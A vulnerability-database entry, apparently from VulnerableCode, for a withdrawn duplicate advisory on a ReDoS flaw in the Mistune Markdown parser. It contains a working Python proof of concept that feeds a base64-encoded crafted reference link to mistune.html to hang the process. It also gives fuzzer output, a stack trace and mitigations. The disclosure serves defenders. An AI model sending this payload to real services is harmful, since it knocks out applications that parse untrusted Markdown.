Lookup for vulnerabilities affecting packages.
| Vulnerability_id | VCID-sh4a-8vh7-ayb4 |
|---|
| Summary | Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.
### Original Description
### Summary
**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.
**Function affected:** parse_link_title() in helpers.py
**Issue:** Malformed reference links cause excessive backtracking and parsing loops.
**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.
### Details
```
Name: mistune
Version: 3.2.0
Python version: Python 3.13.9
PIP version: pip 25.2
OS: Kali-linux-VERSION="2025.4"
```
### PoC
```
import mistune
import base64
print("Exploit started....!")
data = base64.b64decode(
"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg=="
)
mistune.html(data.decode("utf-8", errors="ignore"))
```
### Reproduce steps:
Simply execute above python script it will hang & increase cpu utilization to 100%
**Fuzzer Output (libFuzzer):**
```
ERROR: libFuzzer: timeout after 3 seconds
SUMMARY: libFuzzer: timeout
```
**Stack Trace (Excerpt):**
```
mistune/helpers.py:170 in parse_link_title
mistune/block_parser.py:259 in parse_ref_link
mistune/core.py:216 in parse_method
mistune/block_parser.py:458 in parse
mistune/markdown.py:93 in parse
mistune/markdown.py:120 in __call__
```
### IMAGE POC:
<img width="1194" height="728" alt="POC" src="https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077" />
### Impact:
Denial-of-Service (DoS)
High CPU usage and application hang
Potential for service unavailability in web apps or APIs processing untrusted Markdown
### Suggested Mitigations:
Implement parsing depth and iteration limits.
Limit reference-link title length.
Detects excessive escape character sequences.
Add defensive checks in parse_link_title.
Add fuzz regression tests using the provided PoC.
This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently. |
|---|
| Aliases |
| 0 |
| alias |
GHSA-hjph-f4mc-wx4c |
|
|
|---|
| Fixed_packages |
|
|---|
| Affected_packages |
|
|---|
| References |
|
|---|
| Weaknesses |
| 0 |
| cwe_id |
400 |
| name |
Uncontrolled Resource Consumption |
| description |
The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. |
|
|
|---|
| Exploits |
|
|---|
| Severity_range_score | 7.0 - 8.9 |
|---|
| Exploitability | null |
|---|
| Weighted_severity | null |
|---|
| Risk_score | null |
|---|
| Resource_url | http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4a-8vh7-ayb4 |
|---|